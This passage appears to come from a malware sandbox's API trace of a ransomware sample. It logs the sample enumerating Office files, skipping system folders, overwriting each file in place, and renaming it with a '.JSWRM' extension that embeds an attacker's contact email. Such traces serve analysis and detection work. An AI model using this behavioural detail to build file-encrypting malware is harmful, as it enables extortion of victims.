hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x266a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x266a0, lpOverlapped=0x0) returned 1 [0138.289] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.289] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x266a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x266a0, lpOverlapped=0x0) returned 1 [0138.290] CloseHandle (hObject=0x238) returned 1 [0138.290] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL044.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl044.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL044.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl044.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.291] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7457f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x104bba, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL048.XML", cAlternateFileName="")) returned 1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2=".") returned 1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2="..") returned 1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2="...") returned 1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2="windows") returned -1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2="recovery") returned -1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2="perflogs") returned 1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2="documents and settings") returned 1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2="system volume information") returned -1 [0138.291] lstrcmpiW (lpString1="PGLBL048.XML", lpString2="msocache") returned 1 [0138.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL048.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL048.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL048.XML", lpUsedDefaultChar=0x0) returned 12 [0138.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL048.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL048.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL048.XML", lpUsedDefaultChar=0x0) returned 12 [0138.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL048.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl048.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.292] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1067962) returned 1 [0138.292] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.292] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.308] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.308] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.308] CloseHandle (hObject=0x238) returned 1 [0138.308] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL048.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl048.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL048.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl048.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.343] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59f76, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL054.XML", cAlternateFileName="")) returned 1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2=".") returned 1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2="..") returned 1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2="...") returned 1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2="windows") returned -1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2="recovery") returned -1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2="perflogs") returned 1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2="documents and settings") returned 1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2="system volume information") returned -1 [0138.343] lstrcmpiW (lpString1="PGLBL054.XML", lpString2="msocache") returned 1 [0138.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL054.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL054.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL054.XML", lpUsedDefaultChar=0x0) returned 12 [0138.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL054.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL054.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL054.XML", lpUsedDefaultChar=0x0) returned 12 [0138.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.343] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL054.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl054.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.344] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=368502) returned 1 [0138.344] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.345] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.359] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.359] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.360] CloseHandle (hObject=0x238) returned 1 [0138.360] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL054.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl054.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL054.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl054.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.361] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26c44, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL058.XML", cAlternateFileName="")) returned 1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2=".") returned 1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2="..") returned 1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2="...") returned 1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2="windows") returned -1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2="recovery") returned -1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2="perflogs") returned 1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2="documents and settings") returned 1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2="system volume information") returned -1 [0138.361] lstrcmpiW (lpString1="PGLBL058.XML", lpString2="msocache") returned 1 [0138.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL058.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL058.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL058.XML", lpUsedDefaultChar=0x0) returned 12 [0138.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL058.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL058.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL058.XML", lpUsedDefaultChar=0x0) returned 12 [0138.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL058.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl058.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.362] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=158788) returned 1 [0138.362] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.362] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x26c40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x26c40, lpOverlapped=0x0) returned 1 [0138.416] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.416] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x26c40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x26c40, lpOverlapped=0x0) returned 1 [0138.416] CloseHandle (hObject=0x238) returned 1 [0138.416] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL058.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl058.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL058.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl058.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.418] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d33f7b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e394, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL065.XML", cAlternateFileName="")) returned 1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2=".") returned 1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2="..") returned 1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2="...") returned 1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2="windows") returned -1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2="recovery") returned -1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2="perflogs") returned 1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2="documents and settings") returned 1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2="system volume information") returned -1 [0138.418] lstrcmpiW (lpString1="PGLBL065.XML", lpString2="msocache") returned 1 [0138.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL065.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL065.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL065.XML", lpUsedDefaultChar=0x0) returned 12 [0138.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL065.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL065.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL065.XML", lpUsedDefaultChar=0x0) returned 12 [0138.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL065.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl065.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.419] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=582548) returned 1 [0138.419] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.419] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.440] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.440] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.440] CloseHandle (hObject=0x238) returned 1 [0138.440] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL065.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl065.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL065.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl065.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.442] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d33f7b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d33f7b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d33f7b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xacb30, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL075.XML", cAlternateFileName="")) returned 1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2=".") returned 1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2="..") returned 1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2="...") returned 1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2="windows") returned -1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2="recovery") returned -1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2="perflogs") returned 1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2="documents and settings") returned 1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2="system volume information") returned -1 [0138.442] lstrcmpiW (lpString1="PGLBL075.XML", lpString2="msocache") returned 1 [0138.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL075.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL075.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL075.XML", lpUsedDefaultChar=0x0) returned 12 [0138.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL075.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL075.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL075.XML", lpUsedDefaultChar=0x0) returned 12 [0138.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.442] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL075.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl075.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.443] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=707376) returned 1 [0138.443] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.443] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.456] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.456] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.457] CloseHandle (hObject=0x238) returned 1 [0138.457] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL075.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl075.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL075.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl075.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.459] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d33f7b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d33f7b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d33f7b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6134, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL077.XML", cAlternateFileName="")) returned 1 [0138.459] lstrcmpiW (lpString1="PGLBL077.XML", lpString2=".") returned 1 [0138.459] lstrcmpiW (lpString1="PGLBL077.XML", lpString2="..") returned 1 [0138.459] 